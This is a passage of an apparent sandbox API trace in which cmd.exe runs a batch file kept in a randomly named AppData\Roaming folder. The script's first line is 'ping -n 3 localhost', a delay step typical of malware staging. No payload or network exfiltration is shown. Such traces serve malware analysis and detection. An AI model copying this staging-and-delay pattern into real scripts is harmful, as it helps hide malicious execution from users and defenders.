lpData=0x16ecd0*=0x0, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.544] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x9, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.544] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x4, lpData=0x16ecd0*=0x9, lpcbData=0x16ecc8*=0x4) returned 0x0 [0099.544] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eccc, lpData=0x16ecd0, lpcbData=0x16ecc8*=0x1000 | out: lpType=0x16eccc*=0x0, lpData=0x16ecd0*=0x9, lpcbData=0x16ecc8*=0x1000) returned 0x2 [0099.544] RegCloseKey (hKey=0x40) returned 0x0 [0099.544] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88634c [0099.544] srand (_Seed=0x5b88634c) [0099.544] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd\"" [0099.544] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd\"" [0099.544] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0099.544] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b19b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0099.544] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.544] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.544] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0099.544] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.544] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.545] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0099.545] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0099.545] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0099.545] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0099.545] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0099.545] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0099.545] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0099.545] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0099.545] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16fa90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0099.545] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16fa90, lpFilePart=0x16fa8c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16fa8c*="Desktop") returned 0x18 [0099.545] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0099.545] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f80c | out: lpFindFileData=0x16f80c) returned 0x1affe0 [0099.545] FindClose (in: hFindFile=0x1affe0 | out: hFindFile=0x1affe0) returned 1 [0099.545] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f80c | out: lpFindFileData=0x16f80c) returned 0x1affe0 [0099.545] FindClose (in: hFindFile=0x1affe0 | out: hFindFile=0x1affe0) returned 1 [0099.545] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f80c | out: lpFindFileData=0x16f80c) returned 0x1affe0 [0099.545] FindClose (in: hFindFile=0x1affe0 | out: hFindFile=0x1affe0) returned 1 [0099.545] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0099.546] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0099.546] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0099.546] GetEnvironmentStringsW () returned 0x1b0150* [0099.546] FreeEnvironmentStringsW (penv=0x1b0150) returned 1 [0099.546] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0099.547] GetConsoleOutputCP () returned 0x1b5 [0099.548] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0099.548] GetUserDefaultLCID () returned 0x409 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fbd0, cchData=128 | out: lpLCData="0") returned 2 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fbd0, cchData=128 | out: lpLCData="0") returned 2 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fbd0, cchData=128 | out: lpLCData="1") returned 2 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0099.548] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0099.548] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0099.549] GetConsoleTitleW (in: lpConsoleTitle=0x1b01e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.549] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0099.549] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0099.549] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0099.549] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0099.553] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd", _String2=")") returned 58 [0099.553] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd") returned 3 [0099.553] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd") returned 3 [0099.553] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd") returned 6 [0099.553] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd") returned 6 [0099.553] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd") returned 15 [0099.553] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd") returned 15 [0099.554] GetConsoleTitleW (in: lpConsoleTitle=0x16f8c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.554] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.554] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.554] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f684, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f67c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f67c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0099.554] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0099.554] SetErrorMode (uMode=0x0) returned 0x0 [0099.554] SetErrorMode (uMode=0x1) returned 0x0 [0099.554] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x1bdc08, lpFilePart=0x16f3e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x16f3e8*="vMfCCeRYkvQy") returned 0x2d [0099.554] SetErrorMode (uMode=0x0) returned 0x1 [0099.554] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0099.555] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.558] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.558] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd", fInfoLevelId=0x1, lpFindFileData=0x16f184, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f184) returned 0x1b08f0 [0099.558] FindClose (in: hFindFile=0x1b08f0 | out: hFindFile=0x1b08f0) returned 1 [0099.558] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0099.558] GetConsoleTitleW (in: lpConsoleTitle=0x16f65c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.559] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0099.561] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0099.561] IdentifyCodeAuthzLevelW () returned 0x1 [0099.567] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0099.567] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0099.567] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0099.567] CloseCodeAuthzLevel () returned 0x1 [0099.568] SetErrorMode (uMode=0x0) returned 0x0 [0099.568] SetErrorMode (uMode=0x1) returned 0x0 [0099.568] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd", nBufferLength=0x104, lpBuffer=0x1b04e8, lpFilePart=0x16f548 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd", lpFilePart=0x16f548*="2btKHTzb.cmd") returned 0x3a [0099.568] SetErrorMode (uMode=0x0) returned 0x1 [0099.568] CmdBatNotification () returned 0x0 [0099.811] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\2btkhtzb.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16f58c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0099.811] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0099.811] _get_osfhandle (_FileHandle=3) returned 0x58 [0099.811] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.811] _get_osfhandle (_FileHandle=3) returned 0x58 [0099.811] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.811] ReadFile (in: hFile=0x58, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f570, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x16f570*=0x91, lpOverlapped=0x0) returned 1 [0099.812] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0099.812] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a116640, cbMultiByte=21, lpWideCharStr=0x4a11c640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0099.812] _get_osfhandle (_FileHandle=3) returned 0x58 [0099.812] GetFileType (hFile=0x58) returned 0x1 [0099.812] _get_osfhandle (_FileHandle=3) returned 0x58 [0099.812] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0099.813] _wcsicmp (_String1="ping", _String2=")") returned 71 [0099.813] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0099.813] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0099.813] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0099.813] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0099.813] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0099.813] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0099.814] _tell (_FileHandle=3) returned 21 [0099.814] _close (_FileHandle=3) returned 0 [0099.814] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f344 | out: _Buffer="\r\n") returned 2 [0099.814] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.814] GetFileType (hFile=0x7) returned 0x2 [0099.814] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.814] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f304 | out: lpMode=0x16f304) returned 1 [0099.814] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.814] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f330, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f330*=0x2) returned 1 [0099.814] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0099.814] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0099.814] _vsnwprintf (in: _Buffer=0x4a115e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x16f340 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0099.815] _vsnwprintf (in: _Buffer=0x4a115e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x16f340 | out: _Buffer=">") returned 1 [0099.815] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.815] GetFileType (hFile=0x7) returned 0x2 [0099.815] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.815] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f308 | out: lpMode=0x16f308) returned 1 [0099.815] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.815] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a115e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x16f334, lpReserved=0x0 | out: lpBuffer=0x4a115e40*, lpNumberOfCharsWritten=0x16f334*=0x19) returned 1 [0099.815] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.815] GetFileType (hFile=0x7) returned 0x2 [0099.815] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.815] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f58c | out: lpMode=0x16f58c) returned 1 [0099.815] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.815] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1b0958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x16f5b8, lpReserved=0x0 | out: lpBuffer=0x1b0958*, lpNumberOfCharsWritten=0x16f5b8*=0x4) returned 1 [0099.816] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x16f5c4 | out: _Buffer=" -n 3 localhost ") returned 16 [0099.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.816] GetFileType (hFile=0x7) returned 0x2 [0099.816] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.816] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f584 | out: lpMode=0x16f584) returned 1 [0099.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.816] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x16f5b0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f5b0*=0x10) returned 1 [0099.816] _vsnwprintf (in: _Buffer=0x4a124640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f5e4 | out: _Buffer="\r\n") returned 2 [0099.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.816] GetFileType (hFile=0x7) returned 0x2 [0099.816] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0099.816] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f5a4 | out: lpMode=0x16f5a4) returned 1 [0099.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.816] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a124640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f5d0, lpReserved=0x0 | out: lpBuffer=0x4a124640*, lpNumberOfCharsWritten=0x16f5d0*=0x2) returned 1 [0099.816] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0099.816] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0099.816] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0099.817] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0099.817] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0099.817] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0099.817] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0099.817] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0099.817] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0099.817] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0099.817] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0099.817] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0099.817] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0099.817] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0099.817] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0099.817] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0099.817] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0099.817] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0099.817] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0099.817] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0099.817] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0099.817] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0099.817] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0099.817] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0099.817] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0099.817] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0099.817] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0099.817] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0099.817] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0099.817] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0099.817] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0099.817] _wcsicmp (_String1="ping", _String2="START") returned -3 [0099.817] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0099.817] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0099.817] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0099.817] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0099.817] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0099.817] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0099.817] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0099.817] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0099.817] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0099.817] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0099.817] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0099.818] SetErrorMode (uMode=0x0) returned 0x0 [0099.818] SetErrorMode (uMode=0x1) returned 0x0 [0099.818] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1c0550, lpFilePart=0x16f388 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f388*="Desktop") returned 0x18 [0099.818] SetErrorMode (uMode=0x0) returned 0x1 [0099.818] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.818] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0099.818] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.818] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x16f104, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f104) returned 0xffffffff [0099.819] GetLastError () returned 0x2 [0099.819] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x16f104, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f104) returned 0xffffffff [0099.819] GetLastError () returned 0x2 [0099.819] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x16f104, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f104) returned 0x1c0838 [0099.819] FindClose (in: hFindFile=0x1c0838 | out: hFindFile=0x1c0838) returned 1 [0099.819] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x16f104, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f104) returned 0xffffffff [0099.819] GetLastError () returned 0x2 [0099.819] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x16f104, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f104) returned 0x1c0838 [0099.849] FindClose (in: hFindFile=0x1c0838 | out: hFindFile=0x1c0838) returned 1 [0099.849] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0099.849] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0099.849] GetConsoleTitleW (in: lpConsoleTitle=0x16f154, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.850] SetErrorMode (uMode=0x0) returned 0x0 [0099.850] SetErrorMode (uMode=0x1) returned 0x0 [0099.850] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1c0a98, lpFilePart=0x16ec74 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16ec74*="Desktop") returned 0x18 [0099.850] SetErrorMode (uMode=0x0) returned 0x1 [0099.850] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.850] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0099.850] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.850] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x16e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e9f0) returned 0xffffffff [0099.850] GetLastError () returned 0x2 [0099.850] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x16e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e9f0) returned 0xffffffff [0099.850] GetLastError () returned 0x2 [0099.850] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x16e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e9f0) returned 0x1c0d80 [0099.850] FindClose (in: hFindFile=0x1c0d80 | out: hFindFile=0x1c0d80) returned 1 [0099.850] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x16e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e9f0) returned 0xffffffff [0099.851] GetLastError () returned 0x2 [0099.851] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x16e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e9f0) returned 0x1c0d80 [0099.851] FindClose (in: hFindFile=0x1c0d80 | out: hFindFile=0x1c0d80) returned 1 [0099.851] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0099.851] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0099.851] GetConsoleTitleW (in: lpConsoleTitle=0x16eee8, nSize=0x104 | out: 